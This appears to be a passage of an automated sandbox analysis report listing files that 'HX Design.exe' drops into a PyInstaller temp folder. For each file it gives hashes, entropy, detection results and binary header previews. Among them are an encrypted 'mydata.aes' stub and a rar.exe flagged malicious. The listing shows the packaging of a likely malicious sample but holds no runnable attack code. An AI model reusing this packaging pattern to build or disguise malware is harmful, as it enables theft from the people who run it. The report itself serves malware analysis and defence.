Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...>"k..........." ...&.....0...............................................@...........`A............................................"............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	5.194271824748394
Encrypted:	false
SSDEEP:	192:xfuuEpnWlC0i5CZWthWVgIWEXCVWQ4OWixwVIX01k9z3AyAIqoy:xAnWm5CZWthW4VR9ztuoy
MD5:	3491700E847FB9E9C4413FC82A0AD285
SHA1:	03694CD43A06BB2FFF6A1D85F73BD7B87198E07E
SHA-256:	ED969FAE3CF64F46B5F4D2447980BEFD6F0A7FD05802529DBC793F3C014BC46C
SHA-512:	07E81EABCEF621EC6A84E1932E299E0B865C06E6F9907017BBED0121771712B007A18771099131F24DA134F3CBFF0A7AF30CA4E1C262B117E8BACF055CD54002
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....y..........." ...&.....0...............................................@............`A.........................................................0...............0..(&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.854074053944529
Encrypted:	false
SSDEEP:	192:xMIfh8Y17aFBRMWthWmWEXCVWQ4OW07xwVIX01k9z3AyAIZid:xjLRWthW5DR9ztdid
MD5:	E3EDE68927C68AA73AC95722D24334CE
SHA1:	DBE71E1A56F9B7569B4A568BB67E37C38011B879
SHA-256:	5DD42E524920F4CB467031EB9E0E440BBE73DE0FB39F71E65736A2AB2F6FCFE8
SHA-512:	D935058D8409B518D82336DC0B1521BF411EF77EF49485EDE15BAF5D1AC527F46AD813EBDB889C0F9999D553A879150D5BA41CE3A0B11D5CA08907E378FC9B8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....j..........." ...&.....0...............................................@......).....`A.........................................................0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.816531613699453
Encrypted:	false
SSDEEP:	192:x9vWthWsWEXCVWQ4KWxAgfcMbnoQNpX01k9z3AK0OFol:xpWthWXK/7R9z/0pl
MD5:	3CCA955CDE8362605FC268E4B12ACCAA
SHA1:	6F3C214EF223F35495C0CB0EE359B9D975C14E72
SHA-256:	34C6E58ABCCE5BCCACE50DF3BD6C3E2D3F4E8413B14AAE8E707DDFDDCCDEBA6D
SHA-512:	5B7FE7DEB6066C53BD41479172EAC2736301F5CF32921F13D2CE6AD2811925E7BC1C436627698050BE86DDF18852EEAC927BE4EFC2182D857B31F637ADC6C206
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....?%..........." ...&.....0...............................................@......u-....`A............................................e............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30248
Entropy (8bit):	5.12899703302781
Encrypted:	false
SSDEEP:	384:xB7yaFM4Oe59Ckb1hgmLtWthW+62IR9zT8Fb:xlFMq59Bb1jc9U9zIFb
MD5:	E6184D65799033DBEE51667790130016
SHA1:	B00461D14FFA2BEAB0887BCB716F331090CCE8C9
SHA-256:	EECAC10F830AD0DCBDF0F0DC1422EF5CFED490A877429A4674AECC560869A5E5
SHA-512:	987C14F8C22AE0D6C1005CC7B0D9A240283C2120E8DED030A407F25FB7786F7283980850CA243859F0148DBEB7BFAEC01C8208865B81046999252D07E5F42D53
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...k............." ...&.....P...............................................`............`A.............................................%...........P...............P..(&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.870120119665403
Encrypted:	false
SSDEEP:	192:xsMeXrqjd7xWthWiWEXCVWQ4KWvynwKUWX01k9z3A6weTr6s:xsM4rwWthW1GH2R9zDw6x
MD5:	FA9B5CEC8EED4FEF73EC60D7F4C1EB1E
SHA1:	03F19B2886688DE1FB2016D614FE514F8B508250
SHA-256:	09F19B41A8D71CD5174EFDAE2A7649022780434D7C4416D6121153359AA85918
SHA-512:	744288D8903FDCEED87CC5B7E0E286FAB59584B57ACDD943B04C5F6A39391A1662961A686344C1FDCE36AEA039ADF8B1FCFC883E06011DD592077931716CDFF7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....cZB.........." ...&.....0...............................................@......T.....`A............................................x............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26152
Entropy (8bit):	5.013612013371217
Encrypted:	false
SSDEEP:	192:xhmGqX8mPrpJhhf4AN5/KidWthWqWEXCVWQ4OWImxwVIX01k9z3AyAILBm4/:xhysyr7DWthW9wR9zt/Bm4/
MD5:	BE6D51793BC63716FB45CB49958B0F6A
SHA1:	E2563B2C324B58BAD602C46BC4D6148CE5319C10
SHA-256:	EDD8206EF8CAF25E955E9FBA2C9C8EBF73D8EC3FD0F562372F7ED8B8F7004C2F
SHA-512:	31FA876B8DC54D882DB0D8A3C7E6784B893B6C8B4A04688261720D75402CB4229F07C70DF4DABB032B63940D8E3BA95978D439B5F0F9A21C62A8ADBCC92BCABE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...{?.U.........." ...&.....@...............................................P......Xd....`A............................................4............@...............@..(&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26168
Entropy (8bit):	5.289698919350045
Encrypted:	false
SSDEEP:	192:x7xWRV2OlkuWYFxEpahnWthWBWJWadJCsVWQ4OW3LUNVAv+cQ0GX01k9z3A1tUgL:xgRV2oFVhnWthWgCss4NbZR9zOtUgBN
MD5:	CE04551E4A578993207EED8F49E045DC
SHA1:	F2EA2B8901458263879E76F67C4154559252AA5B
SHA-256:	F6BA90E21A1E31FF2BE7292C2A03D20570788FD829E075AB4A6D37A9CA2BA194
SHA-512:	872AF73065241877679E96DD6C5E8458417436241262829A378768AA47CB290F45AAB67DDF205BCCD6846A2189A0BD26A31FB01F1D7886FE93067687055F4FE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...i.X..........." ...&.....@...............................................P............`A............................................a............@...............@..8&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26040
Entropy (8bit):	5.260094162435671
Encrypted:	false
SSDEEP:	384:xcCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlbWthWnvgR9z9Ur:xcCV5yguNvZ5VQgx3SbwA71IkFZf9zw
MD5:	03F1E99C4258416B4C6800081B3701E2
SHA1:	502D6654CC0A331B8C45EB760DB39EDBC3EE93C9
SHA-256:	ABF8A6AD52F6C71458DC2C159EB8CE7A297494177F8E05FD52A1E7BCEB493426
SHA-512:	7A1FC6488C4EEE4A32963B1E78B76AC1C4D4C196C8B2743AE4CC89805FA02F554210D0FE5A87AFA258ABE3C24C710315FACDEA997E7AA2EFFCF8664B8531C459
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....@...............................................P............`A.........................................................@...............@...%..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	5.2430120828537214
Encrypted:	false
SSDEEP:	192:xUvhwDmWthWJWEXCVWQ4WWHTzxOhJNlOCgX01k9z3Akfo4tKFuE:xUWthWmszxIPaR9zvfptCt
MD5:	C4AF0DC7D97105DEAC352F569BEB603D
SHA1:	F52D7EE9AE432DBF5B42D5FB2A816411138D7E03
SHA-256:	B66AE7E1D0DA45A758B2EC9D2727F8F59A2D0A59BF43BE347369381338C6AFB3
SHA-512:	8961B1ACAB372511D45B4CB08F6672BEBC436F19C854F73058BB28E56DDD57DFD18AAB785B39E0B1254CE9E2989E6DB744E1DE503429932FCE2B0F53F000D91F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...s.D..........." ...&.....0...............................................@............`A.........................................................0...............0..@&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22072
Entropy (8bit):	4.798219482536998
Encrypted:	false
SSDEEP:	192:xU/fHQduLWthWIWJWadJCsVWQ4OW8Z5NVAv+cQ0GX01k9z3A1tUx0:xU/flWthWVCsXNbZR9zOtUO
MD5:	B5C0E86861A795B607B3DDDF29CEAB01
SHA1:	4ECE72B0A9D8F42DA935F9AFFE3280B48805D9C1
SHA-256:	837167FAA319CAB764615FCFDB375008AED60C399B139DC0B3B0338A106F3B18
SHA-512:	6EC88FBBBDD3377650BC575DA6F1D1A8F94B445BCEB6D96894A511B690CD3AF63BE5DF448BC6BCAC0E3200086F90CD1707C5B281BACFBBDF7A02F984F3DDF32B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@...... .....`A............................................^............0...............0..8&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI75082\certifi\cacert.pem

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299427
Entropy (8bit):	6.047872935262006
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
MD5:	50EA156B773E8803F6C1FE712F746CBA
SHA1:	2C68212E96605210EDDF740291862BDF59398AEF
SHA-256:	94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
SHA-512:	01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
Malicious:	false
Reputation:	unknown
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	6.713834296304915
Encrypted:	false
SSDEEP:	192:MnE9WrStIf1F25LInXfzruPpkYj273QJXpHE0w:qGo1F2AXbaPpZa7gJXS0
MD5:	D0B38F1445119C61DE26D4A151558EA6
SHA1:	2DC4AB4C00FF2FF48E6B68701CEB1DA8620D7401
SHA-256:	641BAE68119122101FCE6ABDA99BA8D486AAB14E2CF7C8707B922D312A3071C7
SHA-512:	8A2DBC16C95C06C70AF18CBAF3F35928174F8B032FFFFEF08912A6C799272938C15FB3180E9F9E72B1B297C034B5D2EF2D5DAFEA1BCF811C430F9C962159A203
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...). .......p........................................................`.........................................@...p......P............@..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................"..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	7.866181642604712
Encrypted:	false
SSDEEP:	768:kUwT2VQ73Aw//a2V33x/Wc6ZExQKdQNQiwwoTRHLRbuRgyhC6p2:jw6VQ7ww62lxcOBdQJlozbuRgy0
MD5:	FFFA67EEA0CBA154E5D37D484732C1A5
SHA1:	DA4D420D3EF574602ABAF645C87BE78FC2390780
SHA-256:	328873BB1D98D8B539993AD1C9AD1804CD6942D1013202AA19267931F0C7994D
SHA-512:	5EB591671E5EA490F32F60BE6E272ECF25DCBAB104273DEFCE7A3E6378A80B999A3B4471BE1EA2BB5BA19AAF782551E9E61C0EDB2550CD72CFC766AA35B50B79
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).............H.......................................p............`..........................................b..d....`.......`......................<c.......................................T..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1630488
Entropy (8bit):	7.952879310777133
Encrypted:	false
SSDEEP:	49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:	8377FE5949527DD7BE7B827CB1FFD324
SHA1:	AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:	88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:	C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	227096
Entropy (8bit):	7.928768674438361
Encrypted:	false
SSDEEP:	6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:	B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:	331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:	3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:	5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	124470
Entropy (8bit):	7.708415942805973
Encrypted:	false
SSDEEP:	1536:X92W4oftAXOl2Ve4mR40kcjYAscf0bv6GzDfQuctPlavRo0YTD0IuSp+C1ToDlhc:nfaeEVe4OYrAPEo0mDL9pTCTfh0
MD5:	F792C9DD0632ACCF9BA30611192B13E9
SHA1:	DCE9CDF5CC2810F0E53E655994BE3D8DF022A94C
SHA-256:	E62DB4173A9DCD580DD7954D6263218B0A3339A5226BE4444548B56602ACD1F2
SHA-512:	72D6CA75E24030B4B10A52C8D56A81BB99D2EB88D7833B84441A66B8F2EEF75A7F942797141B451ADD28C595114FA1E1EE75CC04ABF2D2FBBF231C60CDBEEE0B
Malicious:	false
Reputation:	unknown
Preview:	PK........zI.Y.J..............stub-o.pyc........h.dg.i.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........

C:\Users\user\AppData\Local\Temp\_MEI75082\python313.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1850640
Entropy (8bit):	7.994061638516346
Encrypted:	true
SSDEEP:	49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
MD5:	6EF5D2F77064DF6F2F47AF7EE4D44F0F
SHA1:	0003946454B107874AA31839D41EDCDA1C77B0AF
SHA-256:	AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
SHA-512:	1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
